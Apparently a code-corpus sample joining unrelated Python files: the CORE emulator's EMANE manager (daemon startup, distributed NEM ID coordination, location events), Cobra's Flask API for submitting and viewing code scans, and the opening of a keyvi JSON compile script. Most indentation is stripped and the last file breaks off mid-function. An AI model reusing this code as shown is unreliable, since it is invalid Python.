netidx = self.session.get_control_net_index(otadev)
logging.debug(
"emane ota manager device: index(%s) otadev(%s)", netidx, otadev
)
if netidx < 0:
logging.error(
"EMANE cannot start, check core config. invalid OTA device provided: %s",
otadev,
)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(
net_index=netidx, remove=False, conf_required=False
)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error(
"EMANE cannot start, check core config. invalid event service device: %s",
eventdev,
)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(
net_index=netidx, remove=False, conf_required=False
)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
for netif in emane_node.netifs():
nems.append(
(netif.node.name, netif.name, emane_node.getnemid(netif))
)
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug(
"post startup for emane node: %s - %s",
emane_node.id,
emane_node.name,
)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int(
"emane_platform_port", 8100
)
self.transformport = self.session.options.get_config_int(
"emane_transform_port", 8200
)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if (
message.message_type == MessageTypes.LINK.value
and message.flags & MessageFlags.ADD.value
):
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session if we are the "master" Emane object?
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
# create temporary config for updating distributed nodes
typeflags = ConfigFlags.UPDATE.value
config = copy.deepcopy(self.get_configs())
config["platform_id_start"] = str(platformid)
config["nem_id_start"] = str(nemid)
config_data = ConfigShim.config_data(
0, None, typeflags, self.emane_config, config
)
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._objslock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(
net_index=0, remove=False, conf_required=False
)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
# slave server
session = self.session
if not session.master:
return
# not distributed
servers = session.broker.getservernames()
if len(servers) < 2:
return
# normal Config messaging will distribute controlnets
prefix = session.options.get_config("controlnet", default="")
prefixes = prefix.split()
if len(prefixes) < len(servers):
logging.info(
"setting up default controlnet prefixes for distributed (%d configured)",
len(prefixes),
)
prefix = ctrlnet.DEFAULT_PREFIX_LIST[0]
prefixes = prefix.split()
servers.remove("localhost")
servers.insert(0, "localhost")
prefix = " ".join("%s:%s" % (s, prefixes[i]) for i, s in enumerate(servers))
# this generates a config message having controlnet prefix assignments
logging.info("setting up controlnet prefixes for distributed: %s", prefix)
vals = "controlnet=%s" % prefix
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[: coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(
flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len :]
)
logging.debug("sending controlnet message:\n%s", msg)
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug(
"node(%s) already has model(%s)",
emane_node.id,
emane_node.model.name,
)
continue
            # set the model configured for this node; legacy messaging can configure models before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._objslock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(
self, ctrlnet, emane_node, nemid, platform_xmls
)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(
["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir
)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += ("-r",)
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.id
# control network not yet started here
self.session.add_remove_control_interface(
node, 0, remove=False, conf_required=False
)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(
node, otanetidx, remove=False, conf_required=False
)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(
node, eventservicenetidx, remove=False, conf_required=False
)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.network_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.network_cmd(args)
# start emane
args = emanecmd + [
"-f",
os.path.join(path, "emane%d.log" % n),
os.path.join(path, "platform%d.xml" % n),
]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
        # TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we've started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
            logging.error(
                "Warning: EMANE events will not be generated "
                "because the emaneeventservice binding was unable to load "
                "(install the python-emaneeventservice bindings)"
            )
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
        # reset the service, otherwise nextEvent won't work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info(
"subscribing to EMANE location events. (%s)",
threading.currentThread().getName(),
)
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info(
"unsubscribing from EMANE location events. (%s)",
threading.currentThread().getName(),
)
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if (
"latitude" not in attrs
or "longitude" not in attrs
or "altitude" not in attrs
):
logging.warning("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.id
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info(
"location event NEM %s (%s, %s, %s) -> (%s, %s, %s)",
nemid,
lat,
lon,
alt,
x,
y,
z,
)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error(
"Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)",
nemid,
x,
y,
z,
)
return False
# generate a node message for this location update
try:
node = self.session.get_node(n)
except CoreError:
            logging.exception(
                "location event NEM %s has no corresponding node %s", nemid, n
            )
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702",
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(
_id="platform_id_start",
_type=ConfigDataTypes.INT32,
default="1",
label="Starting Platform ID (core)",
),
)
nem_config = [
Configuration(
_id="nem_id_start",
_type=ConfigDataTypes.INT32,
default="1",
label="Starting NEM ID (core)",
)
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len),
]
def __init__(self, session, _id=None):
super(EmaneGlobalModel, self).__init__(session, _id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
api.py | # -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <feei@feei.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import errno
import json
import multiprocessing
import os
import socket
import subprocess
import threading
import time
import traceback
import requests
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from werkzeug.urls import url_unquote
from . import cli
from .cli import get_sid
from .config import Config, running_path, package_path
from .engine import Running
from .log import logger
from .utils import allowed_file, secure_filename, PY2, split_branch
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
q = queue.Queue()
app = Flask(__name__, static_folder='templates/asset')
running_host = '0.0.0.0'
running_port = 5000
def producer(task):
q.put(task)
def consumer():
while True:
task = q.get()
p = multiprocessing.Process(target=cli.start, args=task)
p.start()
p.join()
q.task_done()
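# Each consumer thread handles one scan at a time: it spawns a process per
# task and joins it before pulling the next item from the queue. With the
# 5 consumer threads created in start(), up to 5 scans run concurrently.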
class AddJob(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
target = data.get("target")
formatter = data.get("formatter")
output = data.get("output")
rule = data.get("rule")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not target or target == "":
return {"code": 1002, "msg": "URL cannot be empty."}
if not formatter or formatter == '':
formatter = 'json'
if not output or output == '':
output = ''
if not rule or rule == '':
rule = ''
# Report All Id
a_sid = get_sid(target, True)
running = Running(a_sid)
# Write a_sid running data
running.init_list(data=target)
# Write a_sid running status
data = {
'status': 'running',
'report': ''
}
running.status(data)
if isinstance(target, list):
for t in target:
# Scan
arg = (t, formatter, output, rule, a_sid)
producer(task=arg)
result = {
'msg': 'Add scan job successfully.',
'sid': a_sid,
'total_target_num': len(target),
}
else:
arg = (target, formatter, output, rule, a_sid)
producer(task=arg)
result = {
'msg': 'Add scan job successfully.',
'sid': a_sid,
'total_target_num': 1,
}
return {"code": 1001, "result": result}
class JobStatus(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
sid = data.get("sid")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not sid or sid == "":
return {"code": 1002, "msg": "sid is required."}
sid = str(data.get("sid")) # 需要拼接入路径,转为字符串
running = Running(sid)
if running.is_file() is not True:
data = {
'code': 1004,
'msg': 'scan id does not exist!',
'sid': sid,
'status': 'no such scan',
'report': ''
}
return data
else:
result = running.status()
r_data = running.list()
if result['status'] == 'running':
ret = True
result['still_running'] = dict()
for s_sid, git in r_data['sids'].items():
if Running(s_sid).is_file(True) is False:
result['still_running'].update({s_sid: git})
ret = False
if ret:
result['status'] = 'done'
running.status(result)
data = {
'msg': 'success',
'sid': sid,
'status': result.get('status'),
'report': request.url_root + result.get('report'),
'still_running': result.get('still_running'),
'total_target_num': r_data.get('total_target_num'),
'not_finished': int(r_data.get('total_target_num')) - len(r_data.get('sids'))
+ len(result.get('still_running')),
}
return {"code": 1001, "result": data}
class FileUpload(Resource):
@staticmethod
def post():
"""
Scan by uploading compressed files
:return:
"""
if 'file' not in request.files:
return {'code': 1002, 'result': "File can't empty!"}
file_instance = request.files['file']
if file_instance.filename == '':
return {'code': 1002, 'result': "File name can't empty!"}
if file_instance and allowed_file(file_instance.filename):
filename = secure_filename(file_instance.filename)
dst_directory = os.path.join(package_path, filename)
file_instance.save(dst_directory)
# Start scan
a_sid = get_sid(dst_directory, True)
data = {
'status': 'running',
'report': ''
}
Running(a_sid).status(data)
try:
cli.start(dst_directory, None, 'stream', None, a_sid=a_sid)
except Exception as e:
traceback.print_exc()
code, result = 1001, {'sid': a_sid}
return {'code': code, 'result': result}
else:
return {'code': 1002, 'result': "This extension can't support!"}
class ResultData(Resource):
@staticmethod
def post():
"""
pull scan result data.
:return:
"""
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
s_sid = data.get('sid')
if not s_sid or s_sid == "":
return {"code": 1002, "msg": "sid is required."}
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if not os.path.exists(s_sid_file):
return {'code': 1002, 'msg': 'No such target.'}
with open(s_sid_file, 'r') as f:
scan_data = json.load(f)
if scan_data.get('code') == 1001:
scan_data = scan_data.get('result')
else:
return {
'code': scan_data.get('code'),
'msg': scan_data.get('msg'),
}
rule_filter = dict()
for vul in scan_data.get('vulnerabilities'):
rule_filter[vul.get('id')] = vul.get('rule_name')
return {
'code': 1001,
'result': {
'scan_data': scan_data,
'rule_filter': rule_filter,
}
}
class ResultDetail(Resource):
@staticmethod
def post():
"""
get vulnerable file content
:return:
"""
data = request.json
if not data or data == "":
return {'code': 1003, 'msg': 'Only support json, please post json data.'}
        sid = data.get('sid')
        file_path = data.get('file_path')
        if not sid or sid == '':
            return {"code": 1002, "msg": "sid is required."}
        if not file_path or file_path == '':
            return {'code': 1002, 'msg': 'file_path is required.'}
        # unquote only after validating; url_unquote(None) would raise
        file_path = url_unquote(file_path)
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=sid))
if not os.path.exists(s_sid_file):
return {'code': 1002, 'msg': 'No such target.'}
with open(s_sid_file, 'r') as f:
target_directory = json.load(f).get('result').get('target_directory')
if not target_directory or target_directory == '':
return {'code': 1002, 'msg': 'No such directory'}
if PY2:
file_path = map(secure_filename, [path.decode('utf-8') for path in file_path.split('/')])
else:
file_path = map(secure_filename, [path for path in file_path.split('/')])
filename = target_directory
for _dir in file_path:
filename = os.path.join(filename, _dir)
if os.path.exists(filename):
extension = guess_type(filename)
if is_text(filename):
with open(filename, 'r') as f:
file_content = f.read()
else:
file_content = 'This is a binary file.'
else:
return {'code': 1002, 'msg': 'No such file.'}
return {'code': 1001, 'result': {'file_content': file_content, 'extension': extension}}
class Search(Resource):
@staticmethod
def post():
"""
Search specific rule.
:return:
"""
data = request.json
if not data or data == "":
return {'code': 1003, 'msg': 'Only support json, please post json data.'}
sid = data.get('sid')
if not sid or sid == '':
return {'code': 1002, 'msg': 'sid is required.'}
rule_id = data.get('rule_id')
if not rule_id or rule_id == '':
return {'code': 1002, 'msg': 'rule_id is required.'}
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid))
if not os.path.exists(scan_list_file):
return {'code': 1002, 'msg': 'No such sid.'}
with open(scan_list_file, 'r') as f:
scan_list = json.load(f)
if not isinstance(rule_id, list):
rule_id = [rule_id]
search_data = list()
for s_sid in scan_list.get('sids').keys():
target, branch = split_branch(scan_list.get('sids').get(s_sid))
search_result = search_rule(s_sid, rule_id)
cvi_count = list(search_result.values())
if int(cvi_count[0]) > 0:
search_data.append({
'target_info': {
'sid': s_sid,
'target': target,
'branch': branch,
},
'search_result': search_result,
})
return {
'code': 1001,
'result': search_data,
}
@app.route('/', methods=['GET', 'POST'])
def summary():
a_sid = request.args.get(key='sid')
key = Config(level1="cobra", level2="secret_key").value
if a_sid is None:
return render_template(template_name_or_list='index.html',
key=key)
status_url = 'http://{host}:{port}/api/status'.format(host=running_host, port=running_port)
post_data = {
'key': key,
'sid': a_sid,
}
headers = {
"Content-Type": "application/json",
}
r = requests.post(url=status_url, headers=headers, data=json.dumps(post_data))
try:
scan_status = json.loads(r.text)
except ValueError as e:
return render_template(template_name_or_list='error.html',
msg='Check scan status failed: {0}'.format(e))
if scan_status.get('code') != 1001:
return render_template(template_name_or_list='error.html',
msg=scan_status.get('msg'))
else:
if scan_status.get('result').get('status') == 'running':
still_running = scan_status.get('result').get('still_running')
for s_sid, target_str in still_running.items():
target, branch = split_branch(target_str)
still_running[s_sid] = {'target': target,
'branch': branch}
else:
still_running = dict()
scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
scan_list = Running(a_sid).list()
start_time = os.path.getctime(filename=scan_status_file)
start_time = time.localtime(start_time)
start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
total_targets_number = scan_status.get('result').get('total_target_num')
not_finished_number = scan_status.get('result').get('not_finished')
total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
rule_num = dict()
rules = dict()
targets = list()
for s_sid, target_str in scan_list.get('sids').items():
if s_sid not in still_running:
target_info = dict()
                # split the project address and branch; branch defaults to master
target, branch = split_branch(target_str)
target_info.update({
'sid': s_sid,
'target': target,
'branch': branch,
})
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
with open(s_sid_file, 'r') as f:
s_sid_data = json.load(f)
if s_sid_data.get('code') != 1001:
continue
else:
s_sid_data = s_sid_data.get('result')
total_vul_number += len(s_sid_data.get('vulnerabilities'))
target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))})
target_info.update(s_sid_data)
targets.append(target_info)
for vul in s_sid_data.get('vulnerabilities'):
if 9 <= int(vul.get('level')) <= 10:
critical_vul_number += 1
elif 6 <= int(vul.get('level')) <= 8:
high_vul_number += 1
elif 3 <= int(vul.get('level')) <= 5:
medium_vul_number += 1
elif 1 <= int(vul.get('level')) <= 2:
low_vul_number += 1
try:
rule_num[vul.get('rule_name')] += 1
except KeyError:
rule_num[vul.get('rule_name')] = 1
rules[vul.get('id')] = vul.get('rule_name')
return render_template(template_name_or_list='summary.html',
total_targets_number=total_targets_number,
not_finished_number=not_finished_number,
start_time=start_time,
targets=targets,
a_sid=a_sid,
total_vul_number=total_vul_number,
critical_vul_number=critical_vul_number,
high_vul_number=high_vul_number,
medium_vul_number=medium_vul_number,
low_vul_number=low_vul_number,
rule_num=rule_num,
rules=rules,
running=still_running,)
def key_verify(data):
key = Config(level1="cobra", level2="secret_key").value
_key = data.get("key")
if _key == key:
return True
elif not _key or _key == "":
return {"code": 1002, "msg": "Key cannot be empty."}
elif not _key == key:
return {"code": 4002, "msg": "Key verify failed."}
else:
return {"code": 4002, "msg": "Unknown key verify error."}
def is_text(fn):
msg = subprocess.Popen(['file', fn], stdout=subprocess.PIPE).communicate()[0]
return 'text' in msg.decode('utf-8')
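# is_text relies on the Unix "file" utility, whose output for readable files
# contains the word "text" (e.g. "ASCII text", "UTF-8 Unicode text").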
def guess_type(fn):
import mimetypes
extension = mimetypes.guess_type(fn)[0]
if extension:
"""text/x-python or text/x-java-source"""
# extension = extension.split('/')[1]
extension = extension.replace('-source', '')
else:
extension = fn.split('/')[-1].split('.')[-1]
custom_ext = {
'html': 'htmlmixed',
'md': 'markdown',
}
if custom_ext.get(extension) is not None:
extension = custom_ext.get(extension)
return extension.lower()
def search_rule(sid, rule_id):
"""
Search specific rule name in scan data.
:param sid: scan data id
:param rule_id: a list of rule name
:return: {rule_name1: num1, rule_name2: num2}
"""
scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=sid))
search_result = dict.fromkeys(rule_id, 0)
if not os.path.exists(scan_data_file):
return search_result
with open(scan_data_file, 'r') as f:
scan_data = json.load(f)
if scan_data.get('code') == 1001 and len(scan_data.get('result').get('vulnerabilities')) > 0:
for vul in scan_data.get('result').get('vulnerabilities'):
if vul.get('id') in rule_id:
search_result[vul.get('id')] += 1
return search_result
else:
return search_result
def start(host, port, debug):
logger.info('Start {host}:{port}'.format(host=host, port=port))
api = Api(app)
api.add_resource(AddJob, '/api/add')
api.add_resource(JobStatus, '/api/status')
api.add_resource(FileUpload, '/api/upload')
api.add_resource(ResultData, '/api/list')
api.add_resource(ResultDetail, '/api/detail')
api.add_resource(Search, '/api/search')
# consumer
threads = []
for i in range(5):
threads.append(threading.Thread(target=consumer, args=()))
    for t in threads:
        t.daemon = True
        t.start()
try:
global running_port, running_host
running_host = host if host != '0.0.0.0' else '127.0.0.1'
running_port = port
app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
except socket.error as v:
if v.errno == errno.EACCES:
            logger.critical('[{err}] root permission is required to start the API Server!'.format(err=v.strerror))
exit()
else:
logger.critical('{msg}'.format(msg=v.strerror))
    logger.info('API Server started successfully')
|
compile_json.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import Queue
import threading
import keyvi
import argparse
import os
import gzip
import unicodedata, re
control_chars = ''.join(map(unichr, range(0,32)))
control_char_re = re.compile('[%s]' % re.escape(control_chars))
def remove_control_chars(s):
return control_char_re.sub('', s)
def compile_worker():
while True:
compiler, output = compile_queue.get()
compiler.Compile()
compiler.WriteToFile(output)
compile_queue.task_done()
compile_queue = Queue.Queue()
def compile_file(input, output, jobs, shards):
skipped_keys = 0
compilers = {}
    for i in range(shards):
compilers[i] = keyvi.JsonDictionaryCompiler()
if os.path.isdir(input):
input_files = [os.path.join(input,d) for d in os.listdir(input)]
else:
input_files = [input]
for input_file in input_files:
if input_file.endswith(".gz"):
input_fd = gzip.open(input_file)
else:
